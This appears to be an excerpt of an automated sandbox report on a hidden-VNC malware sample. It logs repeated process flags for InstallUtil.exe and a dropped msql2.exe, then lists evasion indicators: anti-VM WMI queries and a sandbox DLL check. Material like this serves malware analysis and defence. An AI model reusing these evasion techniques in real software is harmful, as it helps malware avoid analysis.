Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: hvnc-CR-SCR-0710.bin.exe PID: 7164, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 3244, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msql2.exe PID: 2140, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: msql2.exe PID: 5356, type: MEMORYSTR

Queries memory information (via WMI often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')

Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive

Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_PhysicalMemory

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: hvnc-CR-SCR-0710.bin.exe, 00000000.00000002.1728479466.0000000002F02000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000002.00000002.1867578030.0000000002A41000.00000004.00000800.00020000.00000000.sdmp, msql2.exe, 00000005.00000002.1936667834.0000000003572000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: SBIEDLL.DLL

Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory allocated: 2E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\hvnc-CR-SCR-0710.bin.exe	Memory allocated: 1450000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: DC0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 28D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 48D0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory allocated: D30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory allocated: 2A40000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory allocated: 2850000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 14C0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2F80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Memory allocated: 2E80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory allocated: 1A30000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\msql2.exe	Memory allocated: 34C0000 memory reserve \| memory write watch	Jump to behavior
